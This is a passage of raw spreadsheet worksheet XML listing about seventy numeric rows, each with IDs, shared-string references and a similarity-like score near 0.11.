    <row r="12589" ht="15.75" customHeight="1">
      <c r="A12589" s="1">
        <v>16018.0</v>
      </c>
      <c r="B12589" s="2">
        <v>4.5017656E7</v>
      </c>
      <c r="C12589" s="2" t="s">
        <v>12103</v>
      </c>
      <c r="D12589" s="2">
        <v>1.0</v>
      </c>
      <c r="E12589" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12589" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="12590" ht="15.75" customHeight="1">
      <c r="A12590" s="1">
        <v>20409.0</v>
      </c>
      <c r="B12590" s="2">
        <v>1.220956E7</v>
      </c>
      <c r="C12590" s="2" t="s">
        <v>12104</v>
      </c>
      <c r="D12590" s="2">
        <v>1.0</v>
      </c>
      <c r="E12590" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12590" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="12591" ht="15.75" customHeight="1">
      <c r="A12591" s="1">
        <v>28013.0</v>
      </c>
      <c r="B12591" s="2">
        <v>2.4340949E7</v>
      </c>
      <c r="C12591" s="2" t="s">
        <v>12105</v>
      </c>
      <c r="D12591" s="2">
        <v>1.0</v>
      </c>
      <c r="E12591" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12591" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="12592" ht="15.75" customHeight="1">
      <c r="A12592" s="1">
        <v>28989.0</v>
      </c>
      <c r="B12592" s="2">
        <v>2.9846406E7</v>
      </c>
      <c r="C12592" s="2" t="s">
        <v>12106</v>
      </c>
      <c r="D12592" s="2">
        <v>1.0</v>
      </c>
      <c r="E12592" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12592" s="2">
        <v>0.1139846743295019</v>
      </c>
    </row>
    <row r="12593" ht="15.75" customHeight="1">
      <c r="A12593" s="1">
        <v>5369.0</v>
      </c>
      <c r="B12593" s="2">
        <v>4.5381227E7</v>
      </c>
      <c r="C12593" s="2" t="s">
        <v>12107</v>
      </c>
      <c r="D12593" s="2">
        <v>1.0</v>
      </c>
      <c r="E12593" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12593" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="12594" ht="15.75" customHeight="1">
      <c r="A12594" s="1">
        <v>16579.0</v>
      </c>
      <c r="B12594" s="2">
        <v>4.6918342E7</v>
      </c>
      <c r="C12594" s="2" t="s">
        <v>12108</v>
      </c>
      <c r="D12594" s="2">
        <v>1.0</v>
      </c>
      <c r="E12594" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12594" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="12595" ht="15.75" customHeight="1">
      <c r="A12595" s="1">
        <v>24555.0</v>
      </c>
      <c r="B12595" s="2">
        <v>1.1291047E7</v>
      </c>
      <c r="C12595" s="2" t="s">
        <v>12109</v>
      </c>
      <c r="D12595" s="2">
        <v>1.0</v>
      </c>
      <c r="E12595" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12595" s="2">
        <v>0.1138888888888889</v>
      </c>
    </row>
    <row r="12596" ht="15.75" customHeight="1">
      <c r="A12596" s="1">
        <v>16118.0</v>
      </c>
      <c r="B12596" s="2">
        <v>4.5424055E7</v>
      </c>
      <c r="C12596" s="2" t="s">
        <v>12110</v>
      </c>
      <c r="D12596" s="2">
        <v>1.0</v>
      </c>
      <c r="E12596" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12596" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="12597" ht="15.75" customHeight="1">
      <c r="A12597" s="1">
        <v>17021.0</v>
      </c>
      <c r="B12597" s="2">
        <v>4.8456373E7</v>
      </c>
      <c r="C12597" s="2" t="s">
        <v>12111</v>
      </c>
      <c r="D12597" s="2">
        <v>1.0</v>
      </c>
      <c r="E12597" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12597" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="12598" ht="15.75" customHeight="1">
      <c r="A12598" s="1">
        <v>24196.0</v>
      </c>
      <c r="B12598" s="2">
        <v>1.0293283E7</v>
      </c>
      <c r="C12598" s="2" t="s">
        <v>12112</v>
      </c>
      <c r="D12598" s="2">
        <v>1.0</v>
      </c>
      <c r="E12598" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12598" s="2">
        <v>0.1138433515482696</v>
      </c>
    </row>
    <row r="12599" ht="15.75" customHeight="1">
      <c r="A12599" s="1">
        <v>485.0</v>
      </c>
      <c r="B12599" s="2">
        <v>1.7503447E7</v>
      </c>
      <c r="C12599" s="2" t="s">
        <v>12113</v>
      </c>
      <c r="D12599" s="2">
        <v>1.0</v>
      </c>
      <c r="E12599" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12599" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="12600" ht="15.75" customHeight="1">
      <c r="A12600" s="1">
        <v>20339.0</v>
      </c>
      <c r="B12600" s="2">
        <v>1.1583742E7</v>
      </c>
      <c r="C12600" s="2" t="s">
        <v>11947</v>
      </c>
      <c r="D12600" s="2">
        <v>1.0</v>
      </c>
      <c r="E12600" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12600" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="12601" ht="15.75" customHeight="1">
      <c r="A12601" s="1">
        <v>31220.0</v>
      </c>
      <c r="B12601" s="2">
        <v>4926400.0</v>
      </c>
      <c r="C12601" s="2" t="s">
        <v>12114</v>
      </c>
      <c r="D12601" s="2">
        <v>1.0</v>
      </c>
      <c r="E12601" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12601" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="12602" ht="15.75" customHeight="1">
      <c r="A12602" s="1">
        <v>31980.0</v>
      </c>
      <c r="B12602" s="2">
        <v>5.3192108E7</v>
      </c>
      <c r="C12602" s="2" t="s">
        <v>12115</v>
      </c>
      <c r="D12602" s="2">
        <v>1.0</v>
      </c>
      <c r="E12602" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12602" s="2">
        <v>0.1137992831541219</v>
      </c>
    </row>
    <row r="12603" ht="15.75" customHeight="1">
      <c r="A12603" s="1">
        <v>14829.0</v>
      </c>
      <c r="B12603" s="2">
        <v>4.1011757E7</v>
      </c>
      <c r="C12603" s="2" t="s">
        <v>12116</v>
      </c>
      <c r="D12603" s="2">
        <v>1.0</v>
      </c>
      <c r="E12603" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12603" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="12604" ht="15.75" customHeight="1">
      <c r="A12604" s="1">
        <v>15092.0</v>
      </c>
      <c r="B12604" s="2">
        <v>4.1791629E7</v>
      </c>
      <c r="C12604" s="2" t="s">
        <v>12117</v>
      </c>
      <c r="D12604" s="2">
        <v>1.0</v>
      </c>
      <c r="E12604" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12604" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="12605" ht="15.75" customHeight="1">
      <c r="A12605" s="1">
        <v>16276.0</v>
      </c>
      <c r="B12605" s="2">
        <v>4.5792575E7</v>
      </c>
      <c r="C12605" s="2" t="s">
        <v>12118</v>
      </c>
      <c r="D12605" s="2">
        <v>1.0</v>
      </c>
      <c r="E12605" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12605" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="12606" ht="15.75" customHeight="1">
      <c r="A12606" s="1">
        <v>21673.0</v>
      </c>
      <c r="B12606" s="2">
        <v>2.5024525E7</v>
      </c>
      <c r="C12606" s="2" t="s">
        <v>12119</v>
      </c>
      <c r="D12606" s="2">
        <v>1.0</v>
      </c>
      <c r="E12606" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12606" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="12607" ht="15.75" customHeight="1">
      <c r="A12607" s="1">
        <v>28075.0</v>
      </c>
      <c r="B12607" s="2">
        <v>2.4628951E7</v>
      </c>
      <c r="C12607" s="2" t="s">
        <v>12120</v>
      </c>
      <c r="D12607" s="2">
        <v>1.0</v>
      </c>
      <c r="E12607" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12607" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="12608" ht="15.75" customHeight="1">
      <c r="A12608" s="1">
        <v>28206.0</v>
      </c>
      <c r="B12608" s="2">
        <v>2.5024524E7</v>
      </c>
      <c r="C12608" s="2" t="s">
        <v>12119</v>
      </c>
      <c r="D12608" s="2">
        <v>1.0</v>
      </c>
      <c r="E12608" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12608" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="12609" ht="15.75" customHeight="1">
      <c r="A12609" s="1">
        <v>31351.0</v>
      </c>
      <c r="B12609" s="2">
        <v>4985337.0</v>
      </c>
      <c r="C12609" s="2" t="s">
        <v>12121</v>
      </c>
      <c r="D12609" s="2">
        <v>1.0</v>
      </c>
      <c r="E12609" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12609" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="12610" ht="15.75" customHeight="1">
      <c r="A12610" s="1">
        <v>1740.0</v>
      </c>
      <c r="B12610" s="2">
        <v>2.8794539E7</v>
      </c>
      <c r="C12610" s="2" t="s">
        <v>12122</v>
      </c>
      <c r="D12610" s="2">
        <v>1.0</v>
      </c>
      <c r="E12610" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12610" s="2">
        <v>0.1137152777777778</v>
      </c>
    </row>
    <row r="12611" ht="15.75" customHeight="1">
      <c r="A12611" s="1">
        <v>11275.0</v>
      </c>
      <c r="B12611" s="2">
        <v>2.0755265E7</v>
      </c>
      <c r="C12611" s="2" t="s">
        <v>12123</v>
      </c>
      <c r="D12611" s="2">
        <v>1.0</v>
      </c>
      <c r="E12611" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12611" s="2">
        <v>0.1137152777777778</v>
      </c>
    </row>
    <row r="12612" ht="15.75" customHeight="1">
      <c r="A12612" s="1">
        <v>6010.0</v>
      </c>
      <c r="B12612" s="2">
        <v>4.7469722E7</v>
      </c>
      <c r="C12612" s="2" t="s">
        <v>12124</v>
      </c>
      <c r="D12612" s="2">
        <v>1.0</v>
      </c>
      <c r="E12612" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12612" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="12613" ht="15.75" customHeight="1">
      <c r="A12613" s="1">
        <v>7424.0</v>
      </c>
      <c r="B12613" s="2">
        <v>5.1160692E7</v>
      </c>
      <c r="C12613" s="2" t="s">
        <v>12125</v>
      </c>
      <c r="D12613" s="2">
        <v>1.0</v>
      </c>
      <c r="E12613" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12613" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="12614" ht="15.75" customHeight="1">
      <c r="A12614" s="1">
        <v>17913.0</v>
      </c>
      <c r="B12614" s="2">
        <v>5.1134056E7</v>
      </c>
      <c r="C12614" s="2" t="s">
        <v>12126</v>
      </c>
      <c r="D12614" s="2">
        <v>1.0</v>
      </c>
      <c r="E12614" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12614" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="12615" ht="15.75" customHeight="1">
      <c r="A12615" s="1">
        <v>1436.0</v>
      </c>
      <c r="B12615" s="2">
        <v>2.668409E7</v>
      </c>
      <c r="C12615" s="2" t="s">
        <v>12127</v>
      </c>
      <c r="D12615" s="2">
        <v>1.0</v>
      </c>
      <c r="E12615" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12615" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="12616" ht="15.75" customHeight="1">
      <c r="A12616" s="1">
        <v>3035.0</v>
      </c>
      <c r="B12616" s="2">
        <v>3.6473444E7</v>
      </c>
      <c r="C12616" s="2" t="s">
        <v>12128</v>
      </c>
      <c r="D12616" s="2">
        <v>1.0</v>
      </c>
      <c r="E12616" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12616" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="12617" ht="15.75" customHeight="1">
      <c r="A12617" s="1">
        <v>7629.0</v>
      </c>
      <c r="B12617" s="2">
        <v>5.1749652E7</v>
      </c>
      <c r="C12617" s="2" t="s">
        <v>12129</v>
      </c>
      <c r="D12617" s="2">
        <v>1.0</v>
      </c>
      <c r="E12617" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12617" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="12618" ht="15.75" customHeight="1">
      <c r="A12618" s="1">
        <v>8407.0</v>
      </c>
      <c r="B12618" s="2">
        <v>5.3887932E7</v>
      </c>
      <c r="C12618" s="2" t="s">
        <v>12130</v>
      </c>
      <c r="D12618" s="2">
        <v>1.0</v>
      </c>
      <c r="E12618" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12618" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="12619" ht="15.75" customHeight="1">
      <c r="A12619" s="1">
        <v>9258.0</v>
      </c>
      <c r="B12619" s="2">
        <v>5.5478011E7</v>
      </c>
      <c r="C12619" s="2" t="s">
        <v>12131</v>
      </c>
      <c r="D12619" s="2">
        <v>1.0</v>
      </c>
      <c r="E12619" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12619" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="12620" ht="15.75" customHeight="1">
      <c r="A12620" s="1">
        <v>9721.0</v>
      </c>
      <c r="B12620" s="2">
        <v>5.6426533E7</v>
      </c>
      <c r="C12620" s="2" t="s">
        <v>12132</v>
      </c>
      <c r="D12620" s="2">
        <v>1.0</v>
      </c>
      <c r="E12620" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12620" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="12621" ht="15.75" customHeight="1">
      <c r="A12621" s="1">
        <v>10193.0</v>
      </c>
      <c r="B12621" s="2">
        <v>5.7391813E7</v>
      </c>
      <c r="C12621" s="2" t="s">
        <v>12133</v>
      </c>
      <c r="D12621" s="2">
        <v>1.0</v>
      </c>
      <c r="E12621" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12621" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="12622" ht="15.75" customHeight="1">
      <c r="A12622" s="1">
        <v>13508.0</v>
      </c>
      <c r="B12622" s="2">
        <v>3.5456423E7</v>
      </c>
      <c r="C12622" s="2" t="s">
        <v>12134</v>
      </c>
      <c r="D12622" s="2">
        <v>1.0</v>
      </c>
      <c r="E12622" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12622" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="12623" ht="15.75" customHeight="1">
      <c r="A12623" s="1">
        <v>17234.0</v>
      </c>
      <c r="B12623" s="2">
        <v>4.9066306E7</v>
      </c>
      <c r="C12623" s="2" t="s">
        <v>12135</v>
      </c>
      <c r="D12623" s="2">
        <v>1.0</v>
      </c>
      <c r="E12623" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12623" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="12624" ht="15.75" customHeight="1">
      <c r="A12624" s="1">
        <v>17652.0</v>
      </c>
      <c r="B12624" s="2">
        <v>5.0430434E7</v>
      </c>
      <c r="C12624" s="2" t="s">
        <v>12136</v>
      </c>
      <c r="D12624" s="2">
        <v>1.0</v>
      </c>
      <c r="E12624" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12624" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="12625" ht="15.75" customHeight="1">
      <c r="A12625" s="1">
        <v>3527.0</v>
      </c>
      <c r="B12625" s="2">
        <v>3.8617174E7</v>
      </c>
      <c r="C12625" s="2" t="s">
        <v>12137</v>
      </c>
      <c r="D12625" s="2">
        <v>1.0</v>
      </c>
      <c r="E12625" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12625" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12626" ht="15.75" customHeight="1">
      <c r="A12626" s="1">
        <v>7108.0</v>
      </c>
      <c r="B12626" s="2">
        <v>5.0350519E7</v>
      </c>
      <c r="C12626" s="2" t="s">
        <v>12138</v>
      </c>
      <c r="D12626" s="2">
        <v>1.0</v>
      </c>
      <c r="E12626" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12626" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12627" ht="15.75" customHeight="1">
      <c r="A12627" s="1">
        <v>7581.0</v>
      </c>
      <c r="B12627" s="2">
        <v>5.1592497E7</v>
      </c>
      <c r="C12627" s="2" t="s">
        <v>12139</v>
      </c>
      <c r="D12627" s="2">
        <v>1.0</v>
      </c>
      <c r="E12627" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12627" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12628" ht="15.75" customHeight="1">
      <c r="A12628" s="1">
        <v>7626.0</v>
      </c>
      <c r="B12628" s="2">
        <v>5.1743261E7</v>
      </c>
      <c r="C12628" s="2" t="s">
        <v>12140</v>
      </c>
      <c r="D12628" s="2">
        <v>1.0</v>
      </c>
      <c r="E12628" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12628" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12629" ht="15.75" customHeight="1">
      <c r="A12629" s="1">
        <v>8087.0</v>
      </c>
      <c r="B12629" s="2">
        <v>5.3040984E7</v>
      </c>
      <c r="C12629" s="2" t="s">
        <v>12141</v>
      </c>
      <c r="D12629" s="2">
        <v>1.0</v>
      </c>
      <c r="E12629" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12629" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12630" ht="15.75" customHeight="1">
      <c r="A12630" s="1">
        <v>8271.0</v>
      </c>
      <c r="B12630" s="2">
        <v>5.3452095E7</v>
      </c>
      <c r="C12630" s="2" t="s">
        <v>12142</v>
      </c>
      <c r="D12630" s="2">
        <v>1.0</v>
      </c>
      <c r="E12630" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12630" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12631" ht="15.75" customHeight="1">
      <c r="A12631" s="1">
        <v>8959.0</v>
      </c>
      <c r="B12631" s="2">
        <v>5.4924984E7</v>
      </c>
      <c r="C12631" s="5" t="s">
        <v>12143</v>
      </c>
      <c r="D12631" s="2">
        <v>1.0</v>
      </c>
      <c r="E12631" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12631" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12632" ht="15.75" customHeight="1">
      <c r="A12632" s="1">
        <v>14882.0</v>
      </c>
      <c r="B12632" s="2">
        <v>4.1105849E7</v>
      </c>
      <c r="C12632" s="2" t="s">
        <v>12144</v>
      </c>
      <c r="D12632" s="2">
        <v>1.0</v>
      </c>
      <c r="E12632" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12632" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12633" ht="15.75" customHeight="1">
      <c r="A12633" s="1">
        <v>16596.0</v>
      </c>
      <c r="B12633" s="2">
        <v>4.7003275E7</v>
      </c>
      <c r="C12633" s="2" t="s">
        <v>12145</v>
      </c>
      <c r="D12633" s="2">
        <v>1.0</v>
      </c>
      <c r="E12633" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12633" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12634" ht="15.75" customHeight="1">
      <c r="A12634" s="1">
        <v>17050.0</v>
      </c>
      <c r="B12634" s="2">
        <v>4.8539018E7</v>
      </c>
      <c r="C12634" s="2" t="s">
        <v>12146</v>
      </c>
      <c r="D12634" s="2">
        <v>1.0</v>
      </c>
      <c r="E12634" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12634" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12635" ht="15.75" customHeight="1">
      <c r="A12635" s="1">
        <v>17259.0</v>
      </c>
      <c r="B12635" s="2">
        <v>4.9140075E7</v>
      </c>
      <c r="C12635" s="2" t="s">
        <v>12147</v>
      </c>
      <c r="D12635" s="2">
        <v>1.0</v>
      </c>
      <c r="E12635" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12635" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12636" ht="15.75" customHeight="1">
      <c r="A12636" s="1">
        <v>17478.0</v>
      </c>
      <c r="B12636" s="2">
        <v>4.9933214E7</v>
      </c>
      <c r="C12636" s="2" t="s">
        <v>12148</v>
      </c>
      <c r="D12636" s="2">
        <v>1.0</v>
      </c>
      <c r="E12636" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12636" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12637" ht="15.75" customHeight="1">
      <c r="A12637" s="1">
        <v>19432.0</v>
      </c>
      <c r="B12637" s="2">
        <v>5.5696525E7</v>
      </c>
      <c r="C12637" s="2" t="s">
        <v>12149</v>
      </c>
      <c r="D12637" s="2">
        <v>1.0</v>
      </c>
      <c r="E12637" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12637" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12638" ht="15.75" customHeight="1">
      <c r="A12638" s="1">
        <v>20612.0</v>
      </c>
      <c r="B12638" s="2">
        <v>1.3974571E7</v>
      </c>
      <c r="C12638" s="2" t="s">
        <v>12150</v>
      </c>
      <c r="D12638" s="2">
        <v>1.0</v>
      </c>
      <c r="E12638" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12638" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12639" ht="15.75" customHeight="1">
      <c r="A12639" s="1">
        <v>21753.0</v>
      </c>
      <c r="B12639" s="2">
        <v>2.6052926E7</v>
      </c>
      <c r="C12639" s="2" t="s">
        <v>12151</v>
      </c>
      <c r="D12639" s="2">
        <v>1.0</v>
      </c>
      <c r="E12639" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12639" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12640" ht="15.75" customHeight="1">
      <c r="A12640" s="1">
        <v>24484.0</v>
      </c>
      <c r="B12640" s="2">
        <v>1.1050499E7</v>
      </c>
      <c r="C12640" s="2" t="s">
        <v>12152</v>
      </c>
      <c r="D12640" s="2">
        <v>1.0</v>
      </c>
      <c r="E12640" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12640" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="12641" ht="15.75" customHeight="1">
      <c r="A12641" s="1">
        <v>249.0</v>
      </c>
      <c r="B12641" s="2">
        <v>1.5033223E7</v>
      </c>
      <c r="C12641" s="2" t="s">
        <v>12153</v>
      </c>
      <c r="D12641" s="2">
        <v>1.0</v>
      </c>
      <c r="E12641" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12641" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12642" ht="15.75" customHeight="1">
      <c r="A12642" s="1">
        <v>573.0</v>
      </c>
      <c r="B12642" s="2">
        <v>1.9081698E7</v>
      </c>
      <c r="C12642" s="2" t="s">
        <v>12154</v>
      </c>
      <c r="D12642" s="2">
        <v>1.0</v>
      </c>
      <c r="E12642" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12642" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12643" ht="15.75" customHeight="1">
      <c r="A12643" s="1">
        <v>1831.0</v>
      </c>
      <c r="B12643" s="2">
        <v>2.9335392E7</v>
      </c>
      <c r="C12643" s="2" t="s">
        <v>12155</v>
      </c>
      <c r="D12643" s="2">
        <v>1.0</v>
      </c>
      <c r="E12643" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12643" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12644" ht="15.75" customHeight="1">
      <c r="A12644" s="1">
        <v>2176.0</v>
      </c>
      <c r="B12644" s="2">
        <v>3.1791902E7</v>
      </c>
      <c r="C12644" s="2" t="s">
        <v>12156</v>
      </c>
      <c r="D12644" s="2">
        <v>1.0</v>
      </c>
      <c r="E12644" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12644" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12645" ht="15.75" customHeight="1">
      <c r="A12645" s="1">
        <v>2698.0</v>
      </c>
      <c r="B12645" s="2">
        <v>3.4851142E7</v>
      </c>
      <c r="C12645" s="2" t="s">
        <v>12157</v>
      </c>
      <c r="D12645" s="2">
        <v>1.0</v>
      </c>
      <c r="E12645" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12645" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12646" ht="15.75" customHeight="1">
      <c r="A12646" s="1">
        <v>2722.0</v>
      </c>
      <c r="B12646" s="2">
        <v>3.494083E7</v>
      </c>
      <c r="C12646" s="2" t="s">
        <v>12158</v>
      </c>
      <c r="D12646" s="2">
        <v>1.0</v>
      </c>
      <c r="E12646" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12646" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12647" ht="15.75" customHeight="1">
      <c r="A12647" s="1">
        <v>3009.0</v>
      </c>
      <c r="B12647" s="2">
        <v>3.6338991E7</v>
      </c>
      <c r="C12647" s="2" t="s">
        <v>12159</v>
      </c>
      <c r="D12647" s="2">
        <v>1.0</v>
      </c>
      <c r="E12647" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12647" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12648" ht="15.75" customHeight="1">
      <c r="A12648" s="1">
        <v>3063.0</v>
      </c>
      <c r="B12648" s="2">
        <v>3.6509694E7</v>
      </c>
      <c r="C12648" s="2" t="s">
        <v>12160</v>
      </c>
      <c r="D12648" s="2">
        <v>1.0</v>
      </c>
      <c r="E12648" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12648" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12649" ht="15.75" customHeight="1">
      <c r="A12649" s="1">
        <v>3211.0</v>
      </c>
      <c r="B12649" s="2">
        <v>3.7284101E7</v>
      </c>
      <c r="C12649" s="2" t="s">
        <v>12161</v>
      </c>
      <c r="D12649" s="2">
        <v>1.0</v>
      </c>
      <c r="E12649" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12649" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12650" ht="15.75" customHeight="1">
      <c r="A12650" s="1">
        <v>3251.0</v>
      </c>
      <c r="B12650" s="2">
        <v>3.7386036E7</v>
      </c>
      <c r="C12650" s="2" t="s">
        <v>12162</v>
      </c>
      <c r="D12650" s="2">
        <v>1.0</v>
      </c>
      <c r="E12650" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12650" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12651" ht="15.75" customHeight="1">
      <c r="A12651" s="1">
        <v>3514.0</v>
      </c>
      <c r="B12651" s="2">
        <v>3.8585134E7</v>
      </c>
      <c r="C12651" s="2" t="s">
        <v>12163</v>
      </c>
      <c r="D12651" s="2">
        <v>1.0</v>
      </c>
      <c r="E12651" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12651" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12652" ht="15.75" customHeight="1">
      <c r="A12652" s="1">
        <v>3690.0</v>
      </c>
      <c r="B12652" s="2">
        <v>3.9515643E7</v>
      </c>
      <c r="C12652" s="2" t="s">
        <v>12164</v>
      </c>
      <c r="D12652" s="2">
        <v>1.0</v>
      </c>
      <c r="E12652" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12652" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12653" ht="15.75" customHeight="1">
      <c r="A12653" s="1">
        <v>3743.0</v>
      </c>
      <c r="B12653" s="2">
        <v>3.968841E7</v>
      </c>
      <c r="C12653" s="2" t="s">
        <v>12165</v>
      </c>
      <c r="D12653" s="2">
        <v>1.0</v>
      </c>
      <c r="E12653" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12653" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12654" ht="15.75" customHeight="1">
      <c r="A12654" s="1">
        <v>4058.0</v>
      </c>
      <c r="B12654" s="2">
        <v>4.1132474E7</v>
      </c>
      <c r="C12654" s="2" t="s">
        <v>12166</v>
      </c>
      <c r="D12654" s="2">
        <v>1.0</v>
      </c>
      <c r="E12654" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12654" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="12655" ht="15.75" customHeight="1">
      <c r="A12655" s="1">
        <v>4266.0</v>
      </c>
      <c r="B12655" s="2">
        <v>4.1861432E7</v>
      </c>
      <c r="C12655" s="2" t="s">
        <v>12167</v>
      </c>
      <c r="D12655" s="2">
        <v>1.0</v>
      </c>
      <c r="E12655" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12655" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
